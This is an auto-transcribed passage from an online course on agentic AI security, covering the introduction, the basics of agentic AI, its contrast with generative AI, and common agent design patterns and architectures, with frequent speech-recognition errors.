Transcripts
1. 1 - Introduction: Hello, everybody. Welcome.
Welcome to this new course, which is agentic AI skin
Security Master Class, learning how to secure AI agents from
beginning to mastery. My name is Tamagal and I'm your instructor
for this course. Now, AI has evolved
between, you know, GNAI models, two highly
autonomous agents known as agentic AI. These AI driven agents, they can understand
their environment. They can make decisions and execute actions
without the need of any human being or any human oversight,
unlike traditional AI, which has typically help
you to generate content or make analysis and
recommendations, agentic AI is designed to act independently
and dynamically, so it can adapt in real time to changing conditions,
which is amazing. Like, it's a gigantic
leap forward for AI. But this level of autonomy also creates new types of risks in cybersecurity and it completely changes the
dynamic, the threat landscape. And these risks go beyond traditional AI risks like data poisoning, model poisoning, adversarial attacks because agentic AI can
operate autonomously, like you said, and it can
interact with other AI agents. Securing these sort of systems is a new
type of challenge. So this is the reason
for this course. In this course, we can explore the unique challenges of
securing agentic AI and the new types of attacks
and how you can go about identifying these
risks and securing them. So what are you going to
learn in this course? You're going to learn
about the agentic AI landscape, what it is. What is agentic AI?
What do you have to do? What are the new
types of threads and risk is introducing? What is the difference between generative AI and agentic EI,
which is quite important. If you want to
understand the leaps which are happening
when it comes to AI. What are the use
cases? Like, what are the positive ways in which
you can use agentic AI? What are the risks of course? How do you threat
model agentic AI? Because agentic AI,
you cannot just threat model it like
any other application, and, of course,
securing agentici. Like, what are the controls? What are the mitigations
that you can put to secure this new type
of AI which has come about? Uh, okay, who is
this course for? Like, whom did I make
this course for? Now, this course is
for first of all, of course, cybersecurity
professionals. This is courses for you. If
you're a security architect, if you're at the C level, you're a CSO, you're a CTO, you're a chief risk officer. You are a GRC professional
governance or skin compliance. Maybe you're a data scientist or a software developer who's interested in
creating a gentic AI, or maybe you are an AI and
machine learning engineer. Honestly speaking, the topics and the concepts I'm going to
be covering in this course, they apply to pretty
much any person who is interested in learning
how the world is changing, how the AI world is changing. And what are the prerequisites
for this course? Not much. You need to have a
basic knowledge of AI, basic knowledge of cybersecurity,
a desire to learn. Of course, you do
not need to have a deep knowledge of AI agents because I'm going to
teach you from scratch. I'm going to assume
that you do not know what agentic AI is,
what AI agents are, and then build up your
understanding so you have a good foundation before we deep dive into the security level. So first of all, like, who am I? Why are
you listening to me? A quick introduction
about myself and who am I and why
should be listening to me. My name, like I
said, is Tamural. I'm a multi award winning
cybersecurity professional. Sorry that picture is from a while back when I was much
younger and had more hair. But I am a speaker
and an instructor. I've been in cybersecurity
for the past 20 plus years. I'm also a cybersecurity
career coach. I have a small YouTube channel called the Cloud
Security guy where I publish weekly on things
about Cloud security, AI, and generous
cybersecurity career advice. I'm also a best selling
author and course creator. I'm like, around 11
plus books on Amazon, around things like
cybersecurity, Cloud security. So just to show
you that I do know a little bit about the topics of AI and cybersecurity because I've been in this industry
for over two decades now. I have a newsletter,
also. You can connect with me on LinkedIn. Always happy to hear
from people and, like, find out,
get some feedback. So why should you care
about your agentic A? Like, why are you taking time out to learn about agentic AI? So, like I said, agentic AI
is the next evolutionary AI. Now, AI is evolving
beyond simple prompting, like you do with
generative AI, right? You prompt it, you get
some response back, then you prompted some more,
get some response back. We are now entering
the age of agentic AI, which is a gigantic
leap forward. So instead of generating text or prompts or image
and analyzing stuff, agentic AI takes
independent actions. Like I said, it learns
from its environment, and it's not just about
answering questions. It's about executing complex workflows,
automating decisions, and working towards long
term goals, complex, long term goals without any
or very little human input. And the reason this shift is so important is
because agentic AI transforms AI form like a passive tool to an
autonomous problem solver. Think about how generative
AI changed the world, right? When it came out in late 2022, when Chat GPT came out, how it revolutionized
creativity, content production,
I can assure you agentic EI is going to have
an even bigger impact. Enabling AI driven assistant,
automation systems, business intelligence
robots, all of these things are
going to come out and have a massive
impact, right? And this means that AI will
no longer be responsible, will no longer be dependent
on human beings to guide it. It'll be orchestrating
multiple steps. And this transition is very, very important because
businesses are looking to automate, cut cost. And that's why they're
going to be looking at agentic AI very,
very importantly. And agentic AI has very, very deep implications for cybersecurity, as we
are going to see. So this is just to give
you a brief overview of why agentic AI
is such a big deal. I found this to be very
funny. That's why you put it. So this is what
unfortunately a lot of people think about when they
think about agentic AI, it's going to be robot
taking over the people. This these ads were
run by a company. And honestly speaking,
I don't agree these ads were deliberately
designed to agitate people, make them angry,
you know, because they wanted to get
that publicity. But this is what a
lot of people think about when they think
about agentic AI that is going to be
robots ticking over completely and completely
replacing them. No, but tasks will get
replaced a lot by agentic A. It is going to have a massive
game changing impact. So I want you to
understand fully, have that mindset about
what agentic AI is. It is a game changer.
Like I said, we are moving away from tasks. We are simply
prompting agentic AI. We're moving sorry, we're
moving away from prompts. And we're moving
towards tasks, okay? And we are giving proper
autonomy to agentic AI. Like, it's going to
be doing stuff by itself, end to end automation. So we're talking
about AI workers, even AI teams of workers. So multi agentic frameworks, which we're going to see shortly in the future
lessons, right? But at the same time, it is a game changer for cybersecurity
in a negative way, also. It is a significant
leap forward. New types of threats are coming new types of
attacks are coming out, it is going to amplify existing threats,
amplify existing risks. Why? All of it because of the
simple thing of autonomy. Because it is going
to be doing things by itself with very little
human oversight. This also introduces a new
type of attack, right? Previously, you could
train human beings. You could give them awareness,
give them training. But now we're talking
about agentic EI. How do you control
their decisions? Who is accountable for the decisions that agentic EI
makes? It is the developer? Is it the company who
is responsible, right? So the attack surface
is expanded greatly. And lastly, which is the
most dangerous thing and which is the reason why
I'm making this course. Many companies like cybersecurity teams
they are completely unaware of the security
and compliance implications of a genetic AI. Companies often they
want to implement new stuff and cut costs without understanding what
are the new types of threats they might be getting
themselves introduced to. So that's why it's so
important to have things like this course and upskill yourself when it comes
to a genetic AI. What are the challenges
which are come? So one of the biggest challenges is the overall
lack of awareness. Around these unique
security risks, right? Even a lot of companies, the
cybersecurity professionals, the risk professionals,
they are not understanding just how
different agentic AI is. There is a lack of best
practice frameworks also. Unlike traditional
cybersecurity, which has well established and mature frameworks like
NIST ISO 2701 CIS, there is no widely adopted security standard
for agentic AI. You know, existing security
guidelines are there like the NIST AI risk manage
framework, the EU AI Act. They give you some direction, but they do not fully address
things like autonomy, decision making
processes or you know, the cross layer interactions of agentic AI, which we're
going to talk about. But this lack a standardized
framework makes it very, very difficult for companies
to implement these tools. And of course, there is also a focus on security
tooling, too much focus. Many security teams feel
that they can just deploy more security tools and get themselves protected
against agentic, but this is a flawed approach. You know, tools will not designed to monitor and
control autonomous AI. Instead, you need a
combination of governance, AI model integrity, threat
modeling to be very effective. And like I said,
a big problem is agentic AI security strategy either too high level.
What does that mean? They adopt companies
adopt broad like vague security policies on AI ethics governance without addressing the technical
security controls, or they are too low level. So they are only focusing on the security tooling
and threat detection without looking at the overall governance framework,
threat modeling. So this is where the
problem comes in, and this is the whole point
of this course to give you a proper balanced approach to equip you to armor you
for this new environment. So like I we are now
pie past the hype phase of agentic AI and entering practical applications. The
world is changing, right? Securing agentic AI
requires a new mindset, a new dedicated
security framework, and a shift from your
traditional approaches. So companies must invest in
these sort of approaches, and you are doing a great
thing by investing in this. So one thing before we
end the introduction, any knowledge that I give you, it will be lost
unless you apply it. So for the project, I'm going to give you a project about doing a threat model for an
agentic AI application, and I want you to focus
on that as we end this course because if you do
not apply this information, you're simply going
to be hearing me talk for a few hours and
then forget everything. So please do not do that. So at the end of
the introduction. I hope I motivated you
now to learn about agentic AI and the unique
security risk you're supposing. Thank you very much,
and I'll now see you in the very first
lesson of this course.
2. 2 - What is Agentic AI : Hello, everybody. Now, welcome
to this lesson in which I'm going to be introducing
and talking about agentic AI, what it is, what's the overview. So if you have
limited knowledge of agentic AI or if you have
no knowledge of agentic AI, then this is the
lesson you really want to listen to and come back to. So like I said before, AI is evolving
very, very rapidly. Like so far, sometimes
it feels like we're in a science fiction
movie or something. You know, first, there was like predictive AI that
analyzes data, uses machine learning algorithms to predict future outcomes. That was the normal AI. Then we move to generative AI that creates new contents,
text, images, and music. And now we're talking
about agentic AI. Not only does AI
generate content, but it's able to
be conversational and autonomously act and we act. That is the main
thing, the autonomy, which defines agentic AI,
as we're going to say. So what are we going to
talk about in this lesson? Like I said, we're going to talk about what is agentic AI? Like, what are the key features
that differentiate it? What is the agentic AI process? Like, how does
agentic AI do this, like magic, which it does? And why is it so important? Like, What's the big deal? Is it just another
trend, another hype, like something people are
hyping up to sell products? Or is it really
like a game change? When it comes to technology, when it comes to
artificial intelligence and how technology is evolving. So like I said, simple
definition of agentic AI. AI, you can define agentic AS, AI to take actions and make decisions with little
or no human oversight. That is it has autonomy. Like, you've seen those
self driving cars, it's able to take
action by itself without a need for a
human to oversee it. And it can break
complex goals down. Like I can solve complex goals by breaking it down into smaller
smaller tasks. Like I said, what sets autonomous AI or agentic AI
apart from the previous types of AI that not only can it reason based on predictions
and everything, but it can also understand
what's happening and take actions and then adapt
and take more actions. And, you know, like
a complex workflow. The whole thing is
autonomy and adaptability. So that's why it is
very much poised to transform industries
like healthcare, finance, because
it can integrate data platforms and help with
time consuming jobs, right? Imagine EI that can act
as a digital labor. Make decisions and adapt
to new situations, the same way we expect
human beings to do. And a lot of people, they
get confused sometimes when they talk about
agentic AI and AI agents. Some people use it
interchangeably. Some people use it like
the one I'm using. So, I mean, they are used
interchangeably quite a bit. I've seen that, but they
are slight differences. So it's important
to differentiate between agentic
AI and AI agents. Essentially, simply put,
agentic AI is the framework. And AI agents are the building blocks
within that framework. So agentic AI I want
you to think is the broader concept of solving issues with
limited supervision, and whereas an AI agent is a specific component
within that system. That is designed to handle
tasks and like processes. So this is agentic AI, it operates through a series
of autonomous software, which we call AI agents. And these are these have the same capabilities
that we talked about, right? So this is what I want
you to understand. So this is how I want you
to understand when I talk about agentic AI and AI agents. And this is like they
said, this is really changing the way that
human beings are interacting with
AI agents because each agent can have its
individual goals and assignments, and they can work together with other agents without any
human being being involved. So within a large
agentic AI framework to solve complex goals. So what are the key
features of agentic AI? Like, what I talked
about this before, but just to drill
down a little bit, the key features are these ones, which is decision making. So because of the
predefined plans and like the machine
learning models that power them, they
can make decisions. Now, this might not seem very
different from normal AI, AI has the ability
to make decisions, which leads to the next problem, which is problem solving. So agentic AI usually uses like a four step process
for solving issues, which I'm going to
talk about perceive, reason, act, and learn. So these four steps start
by having like AI agents, agentic AI gather
and process data. Then usually at the back end, they use something
from generative AI, like an LLM large language
model like Char GPD, for example, to understand the data, to understand
the situation. And then what it does, it's
usually integrated with external tools and
APIs to take action. So that leads it to the next
point, which is autonomy. That is the main thing.
This is why I've made it bold and underlined it because this is what
makes it unique, its ability to learn
and operate on its own. That's what makes it a very, very powerful technology for companies that are interested. The next thing is interactivity. So due to its nature, agentic AI can interact with outside
environment, right? Gather data to
adjust in real time. For example, when I gave self driving vehicles which
are constantly analyzing their surroundings and making decisions in real time.
And lastly, planning. So agentic AI agents, they can handle
complex scenarios, and what they can do
is they can execute multi step strategies so they can break a task down into multiple
steps to understand it. So this is what I really
wanted you to understand. But what I really want you to focus on is the
problem solving part. So what is the agentic EI
process, like we talked about? I talked about these
four things, right? Perceive, reason,
act, and learn. So this is what agentic AI does when it tries to solve problems. The first step is
perceived so AI agents, they gather and they
get this information. This can be through
sensors, databases, APIs to turn data
into insights, right? They find out, hey,
what do I need to do? What is the person, the human being which
is talking to me? What does he want me to do?
Now, the next step is reason. This is where usually
generative AI at the back end, they might be like a large
language model, like, say, ChachP and it guides
the reasoning process. It understands the tasks,
it finds a solution, and it coordinates
with the other models to do the actions which
the user is asking. The next step is acting. So now the agent
perform tasks by connecting with external
systems through APIs, you know, and it can have built in
guardrails to make sure that you're not
violating security. Maybe if you have an
agent which is limited, like doing processing claims, then you can make
sure that it can only process claims
up to $10,000. Anything above that, you
need a human being, right? So this is the act part. And lastly, learn very,
very important agents, they evolve through feedback, and they get better
with every interaction so that the next time
the decision is better, the next time this
process is better. This continuous improvement
is what makes EI smarter. So this is how the overall
agentic AI process works, like the mechanics
of agentic AI. They are designed to foster autonomy and
adaptability efficiency through these four steps,
which you can see. And this is you can think
about so many uskases. For example, in customer
service, EI agents, they can offer further
personalized interactions, offer proactive service, and handle multi channel
support if it says these AI agents can gain leads and move them down the pipeline
without a human being, maybe book meetings, answer questions, day or night, right? And marketing, they can handle campaigns from creation
to optimization. I mean, the use cases are literally like endless,
honestly, speaking. And that is what leads
to my next point, which is why is it important? A lot of people, they
come to me and they say, agentic is just a hype. There's no way it's going to be as big as generative
AI, and I beg to differ. Even if you go to Google Trends, just search for agentici
after generative AI, now we are seeing this huge
this is the next giant step forward when it comes to AI applications
and AI technology. Definitely, agentic AI is
not going away anytime soon. I mean, if you look at the
top technology transfer 2025, the Gartner just
released it, and, you know, we are moving
past the high phase. So even Gartner has said
that the number one, the most important
thing that is there is agentic EI because it will introduce a goal driven
digital workforce. You're going to have
an army of AI people, AI agents doing tasks for
you making autonomously, making plans and
taking decisions and an extension
of the workforce, which is very scary
because they don't need to have vacation, take benefits. They're not going to replace
humans anytime soon, but definitely the AI is going to take away a lot of
the tasks which are there. It's going to make
new jobs, also. I don't want you
to think that it's going to take away your job, but definitely there's going to be massive job disruption. And you can see all the big giants like
Microsoft, Apple, Amazon. All of them are jumping
into the AgentiEIqraz. Same A report you
can take a look at, be it from the Big Four, be it from the World
Economic Forum, from Gartner, all
of them say that Agent AI will dramatically
upskill workers and teams, and it's going to lead
to a large amount of jaunt disruption
within the market. I just read this recent
report, you know, and from Got and they were saying how companies
need to rethink how customer service issues
are resolved because AI agents have the
ability by 2029, they predict it's going to solve 80% of common customer
service issues. So customers are going to
be leveraging agentic Air, whether you like
it or not, whether you are ticked off
about it or not, it doesn't matter
because agentic AI is and it is going to take away a lot of the
interactions there. I'm going to put the links
for all these reports, so you can take a
look at it also. So one thing I want to talk about the evolution
of AI agents. A lot of people sometimes
they come to me and they say, Hey, we already have dealt
with this before, you know, agents like customer
service agents, you go to a website,
you see the chatbot. So what's a big deal? It's the same thing. No,
there has been an evolution which this page is from the World Economic Forum,
which I found very, very useful for showing
just like AIs evolve if you look at the top
from deterministic to non deterministic and to
the current state. So what do I mean
by deterministic? So deterministic agents
were like, you know, the chatbots, rule based
fixed logic and predefined. So same input, you
get the same result. Very, very limited in
their interactions. Those standard
chatbots, you know, people get frustrated
dealing with them. You keep asking it like questions
it's not able to answer because it's
expecting the answer in a very specific
format, right? So slowly, slowly, we move towards non
deterministic AI agents, which are data driven, and they use things like machine learning to predict outcomes. And the results may vary based on the
learned type of data, but slowly slowly this
improvement was there. And now, like the current state, which is there because of generative AI, machine learning, large language
models like Cha GPT, allowing AI to process
vast amounts of data. And now we are moving towards
something like multi agents where AI agents will work
together in real time, without any human beings, it's agents talking to each other, understanding each other, and optimizing the
decisions collectively. So this is what I
really want you to look at that AI is
transitioning away from single isolated agents to collaborative multi
agent systems that inter learn and make
independent decisions, this whole shift which is
happening and why this is the next step from
generative AI to agentic AI. And lastly, I want you
to understand that agentic AI may even change how we interact
with applications. You know, the business
layer. How do you interact with
applications today? Usually, be it a
mobile application, a desktop application like
old legacy application, within your workforce, within
your office environment, you interact with applications, and then the back end
there's a database, right? I mean, it's very
simplistic, but I'm just trying to
make you understand. So you have applications
and they are interacting with databases or data
stores at the back end. And this is how you do your
job, basically, right? When it comes to agentic A, it even has the potential to
remove this business layer. I mean, remove it from you,
it will still be there. But the agentic AI
might be interacting directly with the databases directly with the applications. So this is like what
people are thinking about. So this is just how much
they may disrupt because the ability to automate workflow,
connect with databases, deliver outcomes
without the need for interacting any user is a direct challenge
to how we think about business applications, you know, the business layer. So this is really the essence of how disruptive
agentic AI can be. So I hope I've shown you now just how amazing agentic AI
has the potential to be, I mean, how quickly
it's evolving and how much disruption we can expect to see in
the coming years. So this was a quick
overview about agentic EI. I hope this gives
you a good idea about what agentic AI is. Like I said, I'll put the
links for the things I talked about within the course
resources, so take a look. And remember, it is autonomy. The keyword is autonomy
is what sets it apart. And we talked about the
agentic AI process also. So in the next lesson,
now I'm going to talk about a key question
which gets asked a lot, which is what's the difference between generative
AI and agentic AI? Like, I've explained
it to you already, but I really want to
show you a difference and how they differ and where
they are sync together. So I'll see you in
the next lesson. Thank you very much.
3. 3 - Agentic vs GenAI: Hello, everybody.
Welcome to this lesson. Now in this lesson,
I'm going to just dive a little bit deeper into a topic we touched upon briefly, which is the difference between generative
AI and agentic AI. Now, both GenEI and
agentic AI are like tools that offer amazing
productivity benefits to companies and people. But it's important to
differentiate between the two and how
each of them works a little bit differently
and where the overlap happens because I've seen a lot of times people get confused. About how these
two things differ. So this is what we're going to be covering in this lesson. Basically, the
differences between generative A and
agentic EI and when to use which because there are different use cases for each type of AI, which
we're talking about here. So we've already covered
AgenticEI, right? I've talked before
that the agentic AI describes those AI systems
that can work autonomously, which is without
human oversight. They can make decisions,
act with the ability. They can pursue complex goals with very limited supervision. So at the end of the day, it might be using some sort of LL Mo geni at the back
end for reasoning. But the main thing it is,
it gives its autonomy. It doesn't need a
human being to be prompting it to keep
asking it questions. So this is how it solves
those complex goals, right? Like we talked about, it
has a weasling layer. It understands, it perceives what the problem is it breaks it down and then solves it all without human
interaction being there. When we talk about
generative AI, now, generative AI, it refers
to a subset of AI, right? And like models and
techniques that are designed to create or
generate new content, such as images, text, music, even videos, right? I mean, anybody who has been on the Internet knows
about CHAPT GEI, how the world changed
after late 2022. Unlike traditional AI models, that used to be that
were trained to recognize and classify
existing data. Genutive AI, it
changed the game, right, because it's capable
of producing new content. And usually these models, they are trained on deep
learning algorithms, and they learn from
this data and they understand the statistical
relationship between the text, between the images,
and once trained, they can now generate
new content, right? So this is where the focus is. This is how basically
it looks like, right? You have these
foundational models. These are basically
machine learning models that are trained on a
large amount of data. And once it's trained, it understands what do you call the statistical
relationship between the data. I unders what the
data look like, and now it can
generate new data, which you use typically
through prompts. So you're prompting
it, Hey, write me this article,
generate this image, generate this video
because it has been trained on aboits
and aboits of data. This uses it to
generate new content. So this is what generative AI. So this is in a quick table, you can look at the
difference which is there. Agentic AI focus on autonomy. Generative AI focus
is on content. AgenticA it can solve
problems and execute multi step strategies
all without human input. And generative AI, it can analyze vast amounts
of data and find patterns which it uses
generate new types of data. So one very important
thing now agentic AI does a lot of times
use generative AI, like a large language model, like something like CharPT at
the back end for reasoning. But what it does it adds layers
and layers on top of it. It allows it to break it down, make decisions, make
automations, right? So this is like we talked about the perceived reason
acting and learning. So that thing is there, but
the main thing is autonomy. And with generative it's
usually focusing on content. And again, generative AI, it might have some
level of autonomy. A lot of applications, you see, they have some software autonomy where you have a generative AI, it's talking to people,
it's calling API. So sometimes there's this
overlap pitches there, but I just want
you to understand. So when to use agentic AI, agentic AI is best used when you require the AI to act
by itself, right? Autonomy, you want
it to be autonomous, make decisions and execution, rather than just
content creation. So I'm a security guy, so let's talk about some
cybersecurity use cases. A company wants to implement
something which does real time automated threat
detection and response, right? They want to cut down on
their SOC team costs. There they can probably use agentic AI to monitor
security logs. It will detect anomalies. It can then take action. It can isolate
compromise accounts and automatically excude
security playbooks. You might be thinking, Hey, these things are
already there, well, Agentic AI will take it to the next level because
it can break it down. It can make decisions similar to what a human being would make decisions, right? This is basically taking
it to the next level. Similarly, automated
IT operations you can have an agentic AI, detecting silver failures,
predicting downtime, restarting services, alo taking services
auto autonomously. Again, you might be
saying, Hey, don't we have these things like load balances. But again, agentic AI is all about taking it to the
completely next level, almost reducing the human
element which is there, right? So this is where you would
be using agentic AI. Now, when do you
use generative AI? This would be suited for
more like things like content creation enhancement
rather than autonomy. So a marketing team wants to
generate weekly blog posts. This is where you would
use something generative AI Cloud or Chart GPT, or you have a team which want
to do software development. Now, you need assistance in
writing or debugging code. Again, generative AI, right? To generate code,
simulate something like Q developer from Azo Amazon, Github copilot,
Microsoft copilot, those sort of things
would come into play. So this is like a short lesson because I wanted
to be very clear, sometimes I've seen people
get confused between the two, and I want you to have this
absolute difference between agentic AI and generative AI before we talk about security. So I hope this was
useful to you, and I'll see you in
the next lesson.
4. 4 - Agentic AI Patterns: Hello, everybody.
Welcome to this lesson. Now, we have a very good
foundation now agentic AI. Now let's what I want
to talk about in this lesson is agentic AI
design patterns, which is, how do we when we see
agentic AI in practice, what are the different
types of design patterns, the different types of
architectures that are there? So this is what we're going to be covering in this lesson, the types of patterns, the
types of architectures, and how they differ
and how they converge. You might see more,
you might see less in other courses
or documentation. But typically, the ones
I'm talking about here, they are the ones
which are the most common and almost all
of them the same. They will come in one form, another from the ones I'm going
to be talking about here. So when we talk about
agentic AI patterns, we talk about design
patterns like the building plocks of
how agents work, right? And these are not like
separate separate things. It's very possible
they are combined, but they can help you to
understand, like agents, and they can help you with
the security also later on when we are looking at threat modeling and finding
out the security issues. So agentic AI design patterns, usually they are
reflection, tool usage, planning and whizzing
and multi agent. I'm going to be
covering them. And this is based on Andrew Angie. He's like a considered
to be the primary, I would say, authority
on agentic AI, generative AI, one of the
best minds on the business. I'm going to li the
article which I've used for reference the ones
I'm talking about here. So do check that out
also if you want to deep dive further
into this topic. So let's take a look at the first one,
which is reflection. Now, what do you mean by
agentic AI patterns reflection? Now, today, as of today, when you use something
like generative AI, like a large language
model like hat GPT, you usually use it in
zero shot mode, right? Which is you prompt
a model and you ask for something like write me a report and it
says, Hey, you go. And then you look at it, maybe you might say that, Hey, there are some mistakes or
you wanted to do this wide. You might have had
experience of prompting Chat GPT or Cloud or Gemini, and the first output
is not satisfactory. You deliver critical
feedback to dwt to help the LLM to improve its response and then getting a
better response. So this is what
you typically do. Now, what if you could
automate this process of delivering critical
feedback so the model automatically analyzes
and criticizes its own output and improves its response until it is
as perfect as it could be. This is what I'm
talking about when I talk about reflection, which is agentic AI. Now, you take the task of doing this and you actually
offload it to an agentic AI. So the AI agent will ask, Hey, write me a
report. Here you go. It will keep on improving. I'll do it all without
you interacting with it until it is actually perfect
the way you want it to be. So now, and take this example,
not just to a report. You can write it to
code also, right? Hey, write me this code
and keep on improving it. Keep on iterated until it
is absolutely perfect, and then it's
delivered to a human. So instead of having the LLM, generate its output directly
and sending it to you, agentic AI in
reflection pattern. It would prompt the
LLM multiple times, give it opportunity
to build step by step and improving
the quality. So this is why. And now
you might be thinking, Hey, why don't we
just do it one time? Now, now because it works, it actually improves.
You will see. I mean, just like
you can see that when you prompt Chat GPD and
you give it more feedback, it keeps on improving,
keeps on improving. This pattern, people have
seen like remarkable wizards, and it actually improves
upon what you're saying, and you get a much better
refined and improved upon product as opposed to something you could
get the very first time. So this is the first pattern
design pattern which is reflection now the other
one is tool usage. Now, you might be already
familiar with, like, you know, things like ChachiPT
or the LLLMs that can perform a web
search or execute some code. A lot of tools already
have that, right? And this is the same
thing with agentic AI, but we are going
way beyond here. So you might ask an AI agent, Hey, what are the best
hotels in my area? Now, the agentic EI, it
would execute tools, right? It would do a web
search. It would maybe once it finds
the web search, it downloads it, then it
does some code execution. To it to get the very best
pattern and then tool usage is really extending the ability of agentic AI. Now
it's taking actions. So this is the one
you might ask, Hey, if I invest $100 at compound interest for 12 years, what will be the pattern, right? So rather than trying to
generate answer directly, which might not give you the
best answer, the agentic AI, it might use an LLM at the
background, do a web search, and then rime down
some Python code, all of it executed and
then give you the result. So this is a second pattern,
the first word reflection. The second one was tool usage. What's the third one, which
is planning and reasoning? This is where really
the magic starts to happen when it
comes to EI agents, which is multi step planning, which is where you break down complex problems into tasks, and each task is
executed separately. So you might ask it,
Hey, fine and book me the best vacation
for me in Sweden white. The EA agent will
do a web search. Then at first it understand it'll perceive.
Then it'll break it down. Using something like an
LLM at the background. Hey, I need to do a web search, I need to do a comparison, I need to do a hotel booking. I need to do a flight booking. So all of these problem
little break it down and start executing it step by step, improving
upon it, right? So a lot of people, you know, they had this magical moment
with JAGPTOce it Willis, when they played with it, and they say, Hey, this
is pretty awesome. I never thought AI could
do and this is honestly, if you look at
planning and vision, this is where the magic
happens with agentic AI. This is usually when you do it when you tested
out the agent, and you see that it's breaking your problem down
into multiple small, small tasks and
executing it and then making mistakes and
then learning of it all without you
doing anything. This is where you really
like the light bulb goes off in people's
heads and they see the magic which
agentic AI can do. So this is where really the
magic is happening and where people will see the
power of agentic AI. So a lot of people say, why can't we just do it in a single step or a single tool. But honestly, this
is why the power of agentic comes because
it breaks it down. And by breaking it down into
separate separate tasks, it can see what is working,
what is not working. The tasks which are not working, it will learn from it,
it'll improve upon it. So this is where it
decomposes the task, structured way of reasoning, and, you know, triggering
tools, understanding it. This is truly the power of
agentic A you start to see. And lastly, we want to talk
about multi agent patterns, which is multiple agents
working together. So you might give an
example, like, Hey, create this application for me, you give it to a
project manager agent. The project managen will call another agent which is
similar to a technical lead, and you will have
a coding agent, a solution design agent, a security agent, all of them working together to
create an application. This is not theory. This
is actually happening. You might be thinking, why
don't I just use one agent? Well, similar to how a typical
software company works, you don't have one
guy doing everything, right? You have multiple people. One is good in coding, one is good in solution design, one is good in security. They are being overseen
by a technical lead and who is reporting
to a project manager. This is the same concept. Like, you know, given a
complex task writing software, the multi agent
approach would break the down into sub
tasks and each of it is being executed
by different agents. So like I said, people say
that why are we doing it? Why can't just one agent do it? But the thing is, it works. Many teams get amazing
results by focusing on this. Why? Because all these
agents working together, learning from
together, the output is considerably better. There are many, many
papers on this, which you've seen that using a multi agent
collaborative approach is considerably better results. And, you know, same
thing with LLMs, like with CHAGPD once you
prompt it and you give it the feedback the multi
agent patterns are pretty amazing in the number of outputs they can give
you and the number of improvements they can give you because you will have a
project managen looking at the technical lead the
technical lead agent is interacting with
the coding agent, the solution design agent, security agent, and, you know, it gives you a framework
for braking down all these tasks into
simple, simple tasks. Each of the agents
is optimized for its particular type of
rule that is there. So this was the
multi agent pattern. So now you've
understood the pattern. Like I said, these are
the building blocks. Now, let's talk about
the architectures. Now, the architecture is how this is actually
implemented in practice, you know? These were theories. So these are the
design patterns, how this is actually
work in practice. So we have multiple types of augentic AI architectures
which are there. There might be more. You might see article 0R a
course, which has more. But honestly, all of them originate from
one of these three, which is the single
agent pattern, which is a single agent operating independently
to achieve a goal. You might have a
distributed agent, which is multiple agents working together through
communication channels, and trust is established between them or a supervised
agent architecture, which is like a hierarchical. So you have an org chart, right? The top agent like we saw here, which is the technical lead
looking at the coding agent, the solution design agent,
and the security agent. So you might have a supervised
agent architecture. So the single agent
the distributed agent and the supervised agent. So if you look at the single agent architecture, this is what it'll
look like, right? So you might be prompting it. Find and book me
the Blessed fly to robot Europe and the AI agent, like we talked about earlier, perceive, it'll
first understand it. Okay, maybe you prompted it. You just give it a text
prompt, I'll understand. Then it goes to the reslin which is where it'll call the
Las language model, probably some sort of
generative AI to understand. Hey, what is the
person asking me? The next step is breaking
it down and acting. So the break tasks
down into actions, and it will invoke the API, the tooling, which we
talked about earlier. And it'll start
taking those actions. And it'll learn from it.
Maybe some mistakes happen, some issues happen, I'll learn
from it and move forward. So this is where we
can see the power of agentic A coming in the
single agent architecture. This is an image from the
World Economic Forum. This is how they sound like
how an AA agent works. You can see it's
based pretty much. Even though this diagram and this diagram
don't look the same, the architecture,
you'll be surprised it's still the same
because you have the user input coming in, and it goes to the sensor. The sensor is how
it's perceived. And then you have
the Control Center, which is taking the decisions and you're getting and
it's learning here, and you're getting
the output back. So all these together, these components enable
agents to perceive, learn, plan, interact,
and communicate. So they're pretty much the same concept that
you're seeing here, you're seeing it here also. So this is how a single agent
architecture will work. You might have a
requirement, you know, you might have some
like you said, that find in Book me the
Blessed flight to Europe, where you don't need
multiple agents. A single agent is enough. So this is how a single agent
architecture would work. Now moving ahead,
you might have a distributed or a network
agent architecture. In this setup, all
agents or systems can communicate with
each other to reach a consensus that aligns. So multiple agents are
working together through communication channels,
and usually have a trust, maybe it's to digital
certificates or some sort of authentication where they
are trusting each other. So you might be seeing the si place example I
can give you like, if you've seen
autonomous vehicles like self driving vehicles, which don't need
humans to drive them. Whatever you have multiple
autonomous vehicles parking in like a tight space, they will communicate
with each other, right? They will communicate to avoid collision to avoid this
collision happening. So all of them are
communicating with each other with a common
goal of parking. So allowing them to coordinate effectively and reach consensus. This is where a network agent architecture would
be suited for. And the other one is the
supervised agent architecture. So like I said, in this model, you might have multiple agents which are being supervised. So a supervisor it is coordinating
interaction with them. So it is useful when agents
can converge and diverge. They're not able to
reach a consensus. So this is where the
supervisor agent can mediate and prioritize
what are the objectives. The finding like a
compromise, you know? And example of this
would be like where a buyer and seller cannot reach a consensus
on a transaction, which is then mediated
by a high level, an AI agent supervisor. And, you know, you can even
have a human being there. Like the AI agent
might call a human. So you might have a human in the loop here who is doing this. But this is how
basically it looks like. And this is, again, from
a World Economic Forum, you can see the agent
architecture here, the agent architecture and the supervised
architecture there. So the best of all thing is, all of these things do not
have to work in isolation. So it is very possible these you might have
a combination of these architectures
working as agentic EI becomes more and more
powerful, it gets implemented. So the future is likely to see multiple agent architectures
collaborating. You know, you might have an agent infotainment system
which is in your home. It is collaborating with
your autonomous vehicle, which is using a supervised
agent architecture or a network agent architecture
to reach a consensus. All of them are connected
millions and millions of other agent AI who are doing like a smart
city coordination. So this is this multiple agentic A architecture
can be considered as a future type of system
that can coordinate agent actions among multiple architectures
which are there, you know? So you can imagine just
how powerful this can be. We were talking
about the futuristic to form of power that
agentic I can bring. And I really wanted
you to understand. So just to see where
this is going, how the world can change
once we have this agentic I like more commercialized and more available.
So we do you use? So you have these sort
of architectures. And, of course, this is just
my 100% subjective opinion. It is entirely possible
other use cases are there. But usually, a
single agent pattern is better for simple
autonomous pass. You know, when you need a
single agent to perceive reason and act without the
need for other agents, like when the AI
needs to interact with APIs, security
logs, databases, like standalone automation,
where honestly, you do not need to have
a consensus when you don't need to have multiple
agents working together. This is simple.
Like you might need an AI agent to monitor some
logs and take actions. A simple agentic AI
will be here, right? So because you don't need
multiple agents to be present. So this is where a
single agent will work. Distributed agent
patterns, it's best for complex multi step
and scalability because when tasks need multiple specialized EI agents to collaborate to
achieve a goal, this is where a distributed
agent pattern will come in. This is best suited for large scale enterprise AI
